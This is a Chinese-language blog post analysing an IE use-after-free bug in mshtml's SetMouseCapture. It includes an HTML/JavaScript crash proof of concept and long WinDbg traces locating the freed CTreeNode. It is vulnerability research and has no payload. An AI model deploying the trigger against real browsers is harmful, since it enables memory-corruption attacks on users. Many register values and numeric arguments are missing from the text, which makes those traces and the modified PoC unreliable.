前方高能!!!这篇博文比较长,因为我把完整的调试过程都记录下来了,感兴趣的童鞋可以看下。没有耐心的童鞋可以直接跳到最后看总结:)

  Microsoft Internet Explorer 远程代码执行漏洞(CNNVD-201309-304)

Internet Explorer(IE)是美国微软(Microsoft)公司开发的一款Web浏览器,是Windows操作系统附带的默认浏览器。 
        Microsoft IE 6至11版本中的mshtml.dll文件中的SetMouseCapture功能实现中存在远程代码执行漏洞,该漏洞源于程序访问内存中已被删除或尚未正确分配的对象。攻击者可借助特制的网站并诱使用户查看该网站,利用该漏洞在IE中的当前用户的上下文中执行任意代码,可造成内存损坏。成功利用此漏洞的攻击者可获得与当前用户相同的用户权限。如果当前用户使用管理用户权限登录,成功利用此漏洞的攻击者便可完全控制受影响的系统。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。

POC如下

<html>

<script>

function trigger()

{
var id_0 = document.createElement("sup"); var id_1 = document.createElement("audio");
document.body.appendChild(id_0); document.body.appendChild(id_1);
id_1.applyElement(id_0);
id_0.onlosecapture=function(e) { document.write(""); }
id_0['outerText']="";
id_0.setCapture();
id_1.setCapture();
}
window.onload = function() { trigger(); } </script> </html>

程序crash到如下所示的情况,其中edi的值触发了异常。经过分析后发现,edi的值来自于上层函数的传递。并且这个edi的值处于一个已经释放的堆中,调试记录如下所示。

:> g
(ed4.bd8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax= ebx=041ce6c8 ecx=05e00680 edx=041ce400 esi= edi=074a9fb0
eip=656c1f60 esp=041ce618 ebp=041ce620 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CDoc::HasContainerCapture+0x14:
656c1f60 8b0f mov ecx,dword ptr [edi] ds::074a9fb0=????????
:> !heap -p -a edi
address 074a9fb0 found in
_DPH_HEAP_ROOT @
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
: 74a9000
6b4890b2 verifier!AVrfDebugPageHeapFree+0x000000c2
771e5674 ntdll!RtlDebugFreeHeap+0x0000002f
771a7aca ntdll!RtlpFreeHeap+0x0000005d
77172d68 ntdll!RtlFreeHeap+0x00000142
75a5f1ac kernel32!HeapFree+0x00000014
656be590 mshtml!CTreeNode::Release+0x0000002d
656d15b1 mshtml!CMarkup::UnloadContents+0x00000380
656d2a8a mshtml!CMarkup::TearDownMarkupHelper+0x00000055
656d2a15 mshtml!CMarkup::TearDownMarkup+0x00000049
655b3b5e mshtml!COmWindowProxy::SwitchMarkup+0x000005a0
65502bb4 mshtml!CDocument::open+0x00000426
mshtml!CDocument::write+0x0000007c
655b3267 mshtml!Method_void_SAFEARRAYPVARIANTP+0x00000085
656e235c mshtml!CBase::ContextInvokeEx+0x000005dc
656e25d5 mshtml!CBase::InvokeEx+0x00000025
656edf9a mshtml!DispatchInvokeCollection+0x0000014c
656a4998 mshtml!CDocument::InvokeEx+0x000000f0
mshtml!CBase::VersionedInvokeEx+0x00000020
mshtml!PlainInvokeEx+0x000000eb
6b4ea22a jscript!IDispatchExInvokeEx2+0x00000104
6b4ea175 jscript!IDispatchExInvokeEx+0x0000006a
6b4ea3f6 jscript!InvokeDispatchEx+0x00000098
6b4ea4a0 jscript!VAR::InvokeByName+0x00000139
6b4fd8c8 jscript!VAR::InvokeDispName+0x0000007d
6b4fd96f jscript!VAR::InvokeByDispID+0x000000ce
6b4fe3e7 jscript!CScriptRuntime::Run+0x00002b80
6b4f5c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
6b4f5bfb jscript!ScrFncObj::Call+0x0000008d
6b4f5e11 jscript!CSession::Execute+0x0000015f
6b4ef3ee jscript!NameTbl::InvokeDef+0x000001b5
6b4eea2e jscript!NameTbl::InvokeEx+0x0000012c
65707af1 mshtml!CBase::InvokeDispatchWithThis+0x000001e1

这里可以看出edi为一个已经释放的CTreeNode对象的指针,栈回溯如下

:> KV
ChildEBP RetAddr Args to Child
0428e510 656c1a82 069f4ff0 mshtml!CDoc::HasContainerCapture+0x14
0428e594 6573163d 0428e5b8 mshtml!CDoc::PumpMessage+0x3e4
0428e650 657f580d 0614fff0 069f4ff0 mshtml!CDoc::SetMouseCapture+0xe7
0428e678 654da5d0 07689fc8 0000ffff 0495bfd0 mshtml!CElement::setCapture+0x51
0428e6a0 656e235c 07689fc8 0495bfd0 07665fd8 mshtml!Method_void_oDoVARIANTBOOL+0xc5
0428e714 656ec75a 07689fc8 mshtml!CBase::ContextInvokeEx+0x5dc
0428e764 656ec79a 07689fc8 mshtml!CElement::ContextInvokeEx+0x9d
0428e790 07689fc8 mshtml!CInput::VersionedInvokeEx+0x2d
0428e7e4 6a58a22a 076abfd8 mshtml!PlainInvokeEx+0xeb
0428e820 6a58a175 06eb0d10 jscript!IDispatchExInvokeEx2+0x104
0428e85c 6a58a3f6 06eb0d10 jscript!IDispatchExInvokeEx+0x6a
0428e91c 6a58a4a0 jscript!InvokeDispatchEx+0x98
0428e950 6a59d8c8 06eb0d10 0428e984 jscript!VAR::InvokeByName+0x139
0428e99c 6a59d96f 06eb0d10 jscript!VAR::InvokeDispName+0x7d
0428e9c8 6a59e3e7 06eb0d10 jscript!VAR::InvokeByDispID+0xce
0428eb64 6a595c9d 0428eb7c 0493ef88 jscript!CScriptRuntime::Run+0x2b80
0428ec4c 6a595bfb 0493cf70 jscript!ScrFncObj::CallWithFrameOnStack+0xce
0428ec94 6a5974ac 0493cf70 jscript!ScrFncObj::Call+0x8d
0428ed18 6a594ea4 06eb2fa0 06eb0d10 jscript!NameTbl::InvokeInternal+0x141
0428ed4c 6a59e3e7 06eb0d10 jscript!VAR::InvokeByDispID+0x17f

查看调用

:> UB 656c1a82
mshtml!CDoc::PumpMessage+0x3c0:
656c1a5e 81a7580700007fffffff and dword ptr [edi+758h],0FFFFFF7Fh
656c1a68 push edi
656c1a69 e8eafdffff call mshtml!CDoc::ReleaseDetachedCaptures (656c1858)
656c1a6e 837c242c00 cmp dword ptr [esp+2Ch],
656c1a73 je mshtml!CDoc::PumpMessage+0x444 (656c1a8a)
656c1a75 8b7c2410 mov edi,dword ptr [esp+10h]
656c1a79 8b4c2414 mov ecx,dword ptr [esp+14h]
656c1a7d e8c6040000 call mshtml!CDoc::HasContainerCapture (656c1f48)

但是这样我们对于重用还是看不出个所以然来,这也是ie漏洞分析的难点所在,必须从执行流程入手才能分析明白。

现在我们已经做出了猜测,uaf对象是某个元素的CTreeNode对象,这样我们就可以尝试一下CTreeNode的通用断点。

断下创建:CTreeNode::CTreeNode 释放:CTreeNode::Release

bu mshtml!CTreeNode::Release "ln poi(poi(edx));.echo ==CTreeNode释放==;gc;"

在poc里加上辅助语句来帮助调试

Math.tan(,);
bu jscript!tan

先断在tan上再去下记录断点,这样可以避免非poc的元素进行干扰

:> g
(690d70e0) mshtml!CPhraseElement::`vftable' | (690d7308) mshtml!CBlockElement::`vftable'
Exact matches:
mshtml!CPhraseElement::`vftable' = <no type information>
==CTreeNode释放==
(690d70e0) mshtml!CPhraseElement::`vftable' | (690d7308) mshtml!CBlockElement::`vftable'
Exact matches:
mshtml!CPhraseElement::`vftable' = <no type information>
==CTreeNode释放==
(690fc2e8) mshtml!CGenericElement::`vftable' | (69234ce0) mshtml!CHeaderElement::`vftable'
Exact matches:
mshtml!CGenericElement::`vftable' = <no type information>
==CTreeNode释放==
(690d70e0) mshtml!CPhraseElement::`vftable' | (690d7308) mshtml!CBlockElement::`vftable'
Exact matches:
mshtml!CPhraseElement::`vftable' = <no type information>
==CTreeNode释放==
(6921d3a8) mshtml!CHeadElement::`vftable' | (6921d0d8) mshtml!CHtmlElement::`vftable'
Exact matches:
mshtml!CHeadElement::`vftable' = <no type information>
==CTreeNode释放==
(6921d628) mshtml!CTitleElement::`vftable' | (690d5900) mshtml!CMetaElement::`vftable'
Exact matches:
mshtml!CTitleElement::`vftable' = <no type information>
==CTreeNode释放==
() mshtml!CScriptElement::`vftable' | (69245724) mshtml!CScriptElement::DownLoadScript
Exact matches:
mshtml!CScriptElement::`vftable' = <no type information>
==CTreeNode释放==
() mshtml!CBodyElement::`vftable' | (69289108) mshtml!CCaret::`vftable'
Exact matches:
mshtml!CBodyElement::`vftable' = <no type information>
==CTreeNode释放==
(6921d0d8) mshtml!CHtmlElement::`vftable' | (6921d359) mshtml!CHeadElement::CreateElement
Exact matches:
mshtml!CHtmlElement::`vftable' = <no type information>
==CTreeNode释放==
(6921a9a8) mshtml!CRootElement::`vftable' | (69288ba0) mshtml!CDisplayPointer::`vftable'
Exact matches:
mshtml!CRootElement::`vftable' = <no type information>
==CTreeNode释放==
(6921a9a8) mshtml!CRootElement::`vftable' | (69288ba0) mshtml!CDisplayPointer::`vftable'
Exact matches:
mshtml!CRootElement::`vftable' = <no type information>
==CTreeNode释放==
(6921a9a8) mshtml!CRootElement::`vftable' | (69288ba0) mshtml!CDisplayPointer::`vftable'
Exact matches:
mshtml!CRootElement::`vftable' = <no type information>
==CTreeNode释放== crashed....

这样就得到了完整的CTreeNode释放流程,在记录时加上r edi再与crash对比即可。

bu mshtml!CTreeNode::Release ".echo ==CTreeNode释放==;r edx;ln poi(poi(edx));gc;"

这次可以看到CTreeNode对象的地址,对比crash时的对象地址

:> g
==CTreeNode释放==
edx=10d34fb0
(6a0f70e0) mshtml!CPhraseElement::`vftable' | (6a0f7308) mshtml!CBlockElement::`vftable'
Exact matches:
mshtml!CPhraseElement::`vftable' = <no type information>
==CTreeNode释放==
edx=0a2a4fb0
(6a0f70e0) mshtml!CPhraseElement::`vftable' | (6a0f7308) mshtml!CBlockElement::`vftable'
Exact matches:
mshtml!CPhraseElement::`vftable' = <no type information>
==CTreeNode释放==
edx=132dafb0
(6a11c2e8) mshtml!CGenericElement::`vftable' | (6a254ce0) mshtml!CHeaderElement::`vftable'
Exact matches:
mshtml!CGenericElement::`vftable' = <no type information>
==CTreeNode释放==
edx=132dafb0
(6a11c2e8) mshtml!CGenericElement::`vftable' | (6a254ce0) mshtml!CHeaderElement::`vftable'
Exact matches:
mshtml!CGenericElement::`vftable' = <no type information>
==CTreeNode释放==
edx=0a2a4fb0
(6a0f70e0) mshtml!CPhraseElement::`vftable' | (6a0f7308) mshtml!CBlockElement::`vftable'
Exact matches:
mshtml!CPhraseElement::`vftable' = <no type information>
==CTreeNode释放==
edx=0d152fb0
(6a23d3a8) mshtml!CHeadElement::`vftable' | (6a23d0d8) mshtml!CHtmlElement::`vftable'
Exact matches:
mshtml!CHeadElement::`vftable' = <no type information>
==CTreeNode释放==
edx=13f3afb0
(6a23d628) mshtml!CTitleElement::`vftable' | (6a0f5900) mshtml!CMetaElement::`vftable'
Exact matches:
mshtml!CTitleElement::`vftable' = <no type information>
==CTreeNode释放==
edx=13f3afb0
(6a23d628) mshtml!CTitleElement::`vftable' | (6a0f5900) mshtml!CMetaElement::`vftable'
Exact matches:
mshtml!CTitleElement::`vftable' = <no type information>
==CTreeNode释放==
edx=13f3afb0
(6a23d628) mshtml!CTitleElement::`vftable' | (6a0f5900) mshtml!CMetaElement::`vftable'
Exact matches:
mshtml!CTitleElement::`vftable' = <no type information>
==CTreeNode释放==
edx=13358fb0
(6a265438) mshtml!CScriptElement::`vftable' | (6a265724) mshtml!CScriptElement::DownLoadScript
Exact matches:
mshtml!CScriptElement::`vftable' = <no type information>
==CTreeNode释放==
edx=07636fb0
(6a246670) mshtml!CBodyElement::`vftable' | (6a2a9108) mshtml!CCaret::`vftable'
Exact matches:
mshtml!CBodyElement::`vftable' = <no type information>
==CTreeNode释放==
edx=0e418fb0
(6a23d0d8) mshtml!CHtmlElement::`vftable' | (6a23d359) mshtml!CHeadElement::CreateElement
Exact matches:
mshtml!CHtmlElement::`vftable' = <no type information>
==CTreeNode释放==
edx=14ec8fb0
(6a23a9a8) mshtml!CRootElement::`vftable' | (6a2a8ba0) mshtml!CDisplayPointer::`vftable'
Exact matches:
mshtml!CRootElement::`vftable' = <no type information>
==CTreeNode释放==
edx=14ec8fb0
(6a23a9a8) mshtml!CRootElement::`vftable' | (6a2a8ba0) mshtml!CDisplayPointer::`vftable'
Exact matches:
mshtml!CRootElement::`vftable' = <no type information>
==CTreeNode释放==
edx=14ec8fb0
(6a23a9a8) mshtml!CRootElement::`vftable' | (6a2a8ba0) mshtml!CDisplayPointer::`vftable'
Exact matches:
mshtml!CRootElement::`vftable' = <no type information>
(9bc.eb4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax= ebx=03eee688 ecx=062fa680 edx=03eee3c0 esi= edi=07636fb0
eip=6a301f60 esp=03eee5d8 ebp=03eee5e0 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CDoc::HasContainerCapture+0x14:
6a301f60 8b0f mov ecx,dword ptr [edi] ds::07636fb0=????????

这样对比可以看出是mshtml!CBodyElement对象对应的CTreeNode对象导致的uaf。对于exploiter来说uaf漏洞最重要的是uaf对象是在哪一瞬间被释放的,只有知道了这一点才能占位。

 bu mshtml!CTreeNode::Release ".echo ==CTreeNode释放==;r edx;ln poi(poi(edx));.if(edx==07636fb0){}.else{gc;}"

但是发现这样是断不下来的,因为堆每次分配都是不一样的。

只好去掉gc手动跟到

==CTreeNode释放==

edx=07636fb0 (6a246670) mshtml!CBodyElement::`vftable' | (6a2a9108) mshtml!CCaret::`vftable' Exact matches: mshtml!CBodyElement::`vftable' = <no type information>

:> kv
ChildEBP RetAddr Args to Child
0437d520 6a310a05 0753ff64 0753ff30 0753ff30 mshtml!CTreeNode::Release (FPO: [,,])
0437d584 6a3115b1 0753ff30 mshtml!CMarkup::DestroySplayTree+0x285
0437d5f0 6a312a8a 0753ff30 mshtml!CMarkup::UnloadContents+0x380
0437d60c 6a312a15 0753ff30 mshtml!CMarkup::TearDownMarkupHelper+0x55
0437d638 6a1f3b5e 076c8f30 mshtml!CMarkup::TearDownMarkup+0x49
0437d6a0 6a142bb4 076c8f30 mshtml!COmWindowProxy::SwitchMarkup+0x5a0
0437d79c 6a140789 060e2fc8 mshtml!CDocument::open+0x426
0437d818 6a1f3267 060e2fc8 08df5fe8 08c0cfd0 mshtml!CDocument::write+0x7c
0437d838 6a32235c 060e2fc8 08c0cfd0 08df1fd8 mshtml!Method_void_SAFEARRAYPVARIANTP+0x85
0437d8ac 6a3225d5 060e2fc8 0000041e mshtml!CBase::ContextInvokeEx+0x5dc
0437d8d8 6a32df9a 060e2fc8 0000041e mshtml!CBase::InvokeEx+0x25
0437d928 6a2e4998 060e2fc8 0000000b 0000041e mshtml!DispatchInvokeCollection+0x14c
0437d970 6a2d3148 060e2fc8 0000041e mshtml!CDocument::InvokeEx+0xf0
0437d998 6a2d3104 060e2fc8 0000041e mshtml!CBase::VersionedInvokeEx+0x20
0437d9ec 6c75a22a 08dbafd8 0000041e mshtml!PlainInvokeEx+0xeb
0437da28 6c75a175 06ebad10 0000041e jscript!IDispatchExInvokeEx2+0x104
0437da64 6c75a3f6 06ebad10 jscript!IDispatchExInvokeEx+0x6a
0437db24 6c75a4a0 0000041e jscript!InvokeDispatchEx+0x98
0437db58 6c76d8c8 06ebad10 0437db8c jscript!VAR::InvokeByName+0x139
0437dba4 6c76d96f 06ebad10 jscript!VAR::InvokeDispName+0x7d

其实这个栈回溯并不能看出什么,但可作为以后的参考。此时回头看下poc,createElement可通过CElement::CElement下断监控到,但appendChild并不熟悉。可以肯定的是这个函数继承自CElement类。

; Attributes: bp-based frame

; public: long __stdcall CElement::appendChild(struct IHTMLDOMNode *, struct IHTMLDOMNode * *)
?appendChild@CElement@@QAGJPAUIHTMLDOMNode@@PAPAU2@@Z proc near var_10= word ptr -10h
arg_0= dword ptr
arg_4= dword ptr 0Ch
arg_8= dword ptr 10h mov edi, edi
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 10h
push esi
push edi ; pvarg
push [ebp+arg_8]
xor eax, eax
lea edi, [esp+1Ch+var_10]
stosd
stosd
stosd
stosd
sub esp, 10h
xor eax, eax
mov edi, esp
push [ebp+arg_4]
inc eax
push [ebp+arg_0]
mov [esp+34h+var_10], ax
lea esi, [esp+34h+var_10]
movsd
movsd
movsd
movsd
call ?insertBefore@CElement@@QAGJPAUIHTMLDOMNode@@UtagVARIANT@@PAPAU2@@Z ; CElement::insertBefore(IHTMLDOMNode *,tagVARIANT,IHTMLDOMNode * *)
lea esi, [esp+18h+var_10]
mov edi, eax
call _VariantClear@ ; VariantClear(x)
mov eax, edi
pop edi
pop esi
mov esp, ebp
pop ebp
retn 0Ch
?appendChild@CElement@@QAGJPAUIHTMLDOMNode@@PAPAU2@@Z endp ; sp-analysis failed

由js知识可以知道appendChild是向标签中增加子节点的

实例:
var div=document.createElement("div");//新建一个div元素节点
document.body.appendChild(div);//把div元素节点添加到body元素节点中成为其子节点,但是放在body的现有子节点的最后

最后函数会经过一番调用,调用到CTreeNode::CTreeNode函数以初始化一个CTreeNode对象,下面来调试一下这个过程

<html>

<script>

function trigger()

{
Math.tan(,);
var id_0 = document.createElement("sup");
var id_1 = document.createElement("audio");
Math.cos(,);
document.body.appendChild(id_0);
Math.sin(,);
document.body.appendChild(id_1);
Math.tan(,); id_1.applyElement(id_0);
id_0.onlosecapture=function(e) {
document.write("");
}
id_0['outerText']="";
id_0.setCapture();
id_1.setCapture();
}
window.onload = function() {
trigger();
}
</script>
</html>

如上在poc中增设辅助调试语句

Breakpoint  hit
eax= ebx=0411e380 ecx= edx= esi=0411e370 edi=0411e370
eip=6c77d8c0 esp=0411e274 ebp=0411e2b0 iopl= nv up ei pl nz ac pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
jscript!tan:
6c77d8c0 ff258010756c jmp dword ptr [jscript!_imp__tan (6c751080)] ds::6c751080={msvcrt!tan (773dde34)}
:> bu mshtml!CreateElement
Matched: 6a23d88c mshtml!CreateElement = <no type information>
Matched: 6a234bb0 mshtml!CreateElement = <no type information>
Ambiguous symbol error at 'mshtml!CreateElement'
:> bu 6a23d88c
:> bu 6a234bb0
:> bu jscript!cos
:> g
Breakpoint hit
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bb0 esp=0425e67c ebp=0425e718 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement:
6a234bb0 8bff mov edi,edi

来跟一下mshtml!CreateElement函数,我之前已经在ie调试心得里提到过了

:> g
Breakpoint hit
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bb0 esp=0425e67c ebp=0425e718 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement:
6a234bb0 8bff mov edi,edi
:> p
Breakpoint hit
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bb0 esp=0425e67c ebp=0425e718 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement:
6a234bb0 8bff mov edi,edi
:>
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bb2 esp=0425e67c ebp=0425e718 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x2:
6a234bb2 push ebp
:>
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bb3 esp=0425e678 ebp=0425e718 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x3:
6a234bb3 8bec mov ebp,esp
:>
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bb5 esp=0425e678 ebp=0425e678 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x5:
6a234bb5 83ec10 sub esp,10h
:>
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bb8 esp=0425e668 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x8:
6a234bb8 push ebx
:>
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bb9 esp=0425e664 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x9:
6a234bb9 8b5d10 mov ebx,dword ptr [ebp+10h] ss::0425e688=
:>
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bbc esp=0425e664 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0xc:
6a234bbc push esi
:>
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bbd esp=0425e660 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0xd:
6a234bbd c7451000000000 mov dword ptr [ebp+10h], ss::0425e688=
:>
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bc4 esp=0425e660 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x14:
6a234bc4 85db test ebx,ebx
:>
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bc6 esp=0425e660 ebp=0425e678 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x16:
6a234bc6 0f84c67d0300 je mshtml!CreateElement+0x18 (6a26c992) [br=]
:>
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a26c992 esp=0425e660 ebp=0425e678 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x18:
6a26c992 bb08832a6a mov ebx,offset mshtml!g_Zero (6a2a8308)
:>
eax=0425e750 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a26c997 esp=0425e660 ebp=0425e678 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x1d:
6a26c997 e93082fcff jmp mshtml!CreateElement+0x1d (6a234bcc)
:>
eax=0425e750 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bcc esp=0425e660 ebp=0425e678 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x1d:
6a234bcc 0fb64701 movzx eax,byte ptr [edi+] ds::0425e6a9=
:>
eax= ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bd0 esp=0425e660 ebp=0425e678 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x21:
6a234bd0 c1e004 shl eax,
:>
eax= ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bd3 esp=0425e660 ebp=0425e678 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x24:
6a234bd3 05709a2c6a add eax,offset mshtml!g_atagdesc (6a2c9a70)
:>
eax=6a2ca070 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bd8 esp=0425e660 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x29:
6a234bd8 0f84b34e1500 je mshtml!CreateElement+0x2b (6a389a91) [br=]
:>
eax=6a2ca070 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bde esp=0425e660 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x38:
6a234bde 8b4008 mov eax,dword ptr [eax+] ds::6a2ca078={mshtml!CPhraseElement::CreateElement (6a269f4b)}
:>
eax=6a269f4b ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234be1 esp=0425e660 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x3b:
6a234be1 8d4d10 lea ecx,[ebp+10h]
:>
eax=6a269f4b ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234be4 esp=0425e660 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x3e:
6a234be4 push ecx
:>
eax=6a269f4b ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234be5 esp=0425e65c ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x3f:
6a234be5 push edx
:>
eax=6a269f4b ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234be6 esp=0425e658 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x40:
6a234be6 push edi
:>
eax=6a269f4b ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234be7 esp=0425e654 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x41:
6a234be7 ffd0 call eax {mshtml!CPhraseElement::CreateElement (6a269f4b)}
:> ln eax
(6a269f4b) mshtml!CPhraseElement::CreateElement | (6a269fdd) mshtml!FindPeer
Exact matches:
mshtml!CPhraseElement::CreateElement = <no type information>

可见var id_0 = document.createElement("sup");导致了CPhraseElement对象的创建

bu mshtml!CElement::CElement

来看下这个对象的内容,虽然估计与漏洞触发关系不大

:> p
Breakpoint hit
eax=1af02fd8 ebx=6a2a8308 ecx=7782349f edx= esi=1af02fd8 edi=
eip=6a23480f esp=0425e638 ebp=0425e64c iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement:
6a23480f 8bff mov edi,edi
:>
eax=1af02fd8 ebx=6a2a8308 ecx=7782349f edx= esi=1af02fd8 edi=
eip=6a234811 esp=0425e638 ebp=0425e64c iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x2:
6a234811 push ebp
:>
eax=1af02fd8 ebx=6a2a8308 ecx=7782349f edx= esi=1af02fd8 edi=
eip=6a234812 esp=0425e634 ebp=0425e64c iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x3:
6a234812 8bec mov ebp,esp
:>
eax=1af02fd8 ebx=6a2a8308 ecx=7782349f edx= esi=1af02fd8 edi=
eip=6a234814 esp=0425e634 ebp=0425e634 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x5:
6a234814 push ebx
:>
eax=1af02fd8 ebx=6a2a8308 ecx=7782349f edx= esi=1af02fd8 edi=
eip=6a234815 esp=0425e630 ebp=0425e634 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x6:
6a234815 8b5d0c mov ebx,dword ptr [ebp+0Ch] ss::0425e640=05ad0680
:>
eax=1af02fd8 ebx=05ad0680 ecx=7782349f edx= esi=1af02fd8 edi=
eip=6a234818 esp=0425e630 ebp=0425e634 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0x9:
6a234818 push esi
:>
eax=1af02fd8 ebx=05ad0680 ecx=7782349f edx= esi=1af02fd8 edi=
eip=6a234819 esp=0425e62c ebp=0425e634 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0xa:
6a234819 push edi
:>
eax=1af02fd8 ebx=05ad0680 ecx=7782349f edx= esi=1af02fd8 edi=
eip=6a23481a esp=0425e628 ebp=0425e634 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0xb:
6a23481a 8bf8 mov edi,eax
:> dd eax
1af02fd8
1af02fe8
1af02ff8 ???????? ????????
1af03008 ???????? ???????? ???????? ????????
1af03018 ???????? ???????? ???????? ????????
1af03028 ???????? ???????? ???????? ????????
1af03038 ???????? ???????? ???????? ????????
1af03048 ???????? ???????? ???????? ????????
:> p
eax=1af02fd8 ebx=05ad0680 ecx=7782349f edx= esi=1af02fd8 edi=1af02fd8
eip=6a23481c esp=0425e628 ebp=0425e634 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::CElement+0xd:
6a23481c 8bf7 mov esi,edi
:>
eax=1af02fd8 ebx=05ad0680 ecx=7782349f edx= esi=1af02fd8 edi=1af02fd8
